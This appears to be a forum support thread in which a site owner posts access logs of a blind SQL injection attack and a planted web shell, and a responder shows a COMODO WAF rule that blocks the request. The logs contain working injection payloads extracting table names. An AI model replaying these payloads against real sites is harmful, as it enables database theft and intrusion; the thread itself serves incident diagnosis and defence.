VERY SERIOUS VULNERABILITY thas WAS NOT STOPED

This night a hacker infected a shell file, using SQL injection, and COMODO Firewall didn’t stoped the attack.

The Logs:


5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%2616--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+char_length((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))))>3028--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%261--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%262--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%264--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%268--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%261--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%26128--+ HTTP/1.1" 200 10531 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%2616--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%264--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%2632--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%262--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+char_length((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))))>3029--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%26128--+ HTTP/1.1" 200 10531 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%2632--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%264--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%262--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+char_length((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))))>3030--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%268--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%261--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%2616--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
---> and here is the shell
5.249.87.35 - - [27/Feb/2015:00:58:06 +0000] "GET /imagens/topos/rc.php HTTP/1.1" 200 43661 "http://www.aoficina.pt/backoffice/bannerstopo/editar.php?id=13&ordem=id&pag=1&limit=100&pag_actual=listar.php&s=&ord=0" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36"

I have taken the first request from your log and tried to reproduce it. Here what I got:

Message: Access denied with code 403 (phase 2). Pattern match "(?i:\\b(?:t(?:able_name\\b|extpos[^a-zA-Z0-9_]{1,}\\()|(?:a(?:ll_objects|tt(?:rel|typ)id)|column_(?:id|name)|mb_users|object_(?:id|(?:nam|typ)e)|pg_(?:attribute|class)|rownum|s(?:ubstr(?:ing){0,1}|ys(?:c(?:at|o(?:lumn|nstraint)s)|dba|ibm|(?:filegroup|o ..." at ARGS:id. [file "/usr/local/CWAF/rules/cwaf_02.conf"] [line "299"] [id "211540"] [msg "COMODO WAF: Blind SQL Injection Attack"] [data "Matched Data: substring found within ARGS:id: 1 and ascii(substring((select concat(0x53514c69,mid((select concat(group_concat(0x6868,hex(cast(r as char)),0x6a6a,hex(cast(ifnull(q,0x30) as char)),0x6868 order by r separator 0x6767),0x69)from(select TABLE_NAME r,table_rows q from information_schema.tables where TABLE_SCHEMA=0x6964365f6264 order by r)x),24,65536))),3028,1))&64--"] [severity "CRITICAL"]

As you can see rule id “211540” have blocked this attack. But in your case I see response code 200. So make sure you haven’t disabled this rule.

TDmitry, absolutly right, the client turned off modsecurity on is cpanel. I didn’t disable the “modsecurity” button on cpanel on this server, and he turned the thing off.

Your help was very precious. Thank you very much.